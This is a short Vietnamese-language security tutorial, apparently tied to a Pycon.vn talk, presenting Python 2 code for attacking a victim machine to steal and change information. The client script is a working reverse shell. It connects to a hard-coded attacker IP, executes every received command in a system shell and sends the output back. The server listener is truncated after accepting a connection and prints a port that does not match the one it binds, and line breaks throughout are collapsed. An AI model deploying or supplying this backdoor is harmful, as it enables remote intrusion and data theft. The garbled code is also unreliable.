Ví dụ này demo lại quá trình tấn công vào máy nạn nhân và thực hiện các câu lệnh như: ipconfig, dir … nhằm mục đích đánh cắp và thay đổi thông tin.
Client
# Python For Security Pycon.vn # Email: khanhnn@pythonvietnam.info # Basic TCP Client import socket # For Building TCP Connection import subprocess # To start the shell in the system def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' s.connect(('172.16.12.95', 8081)) # Here we define the Attacker IP and the listening port while True: # keep receiving commands from the Kali machine command = s.recv(1024) # read the first KB of the tcp socket if 'terminate' in command: # if we got termiante order from the attacker, close the socket and break the loop s.close() break else: # otherwise, we pass the received command to a shell process CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) s.send( CMD.stdout.read() ) # send back the result s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error def main (): connect() main()
Server
# Python For Security Pycon.vn # Email: khanhnn@pythonvietnam.info # Simple TCP Server import socket # For Building TCP Connection def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' s.bind(("172.16.12.95", 8081)) # define the kali IP and the listening port s.listen(1) # define the backlog size, since we are expecting a single connection from a single # target we will listen to one connection print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source # port in a tuple format (IP,port)
Chúc các bạn thành công !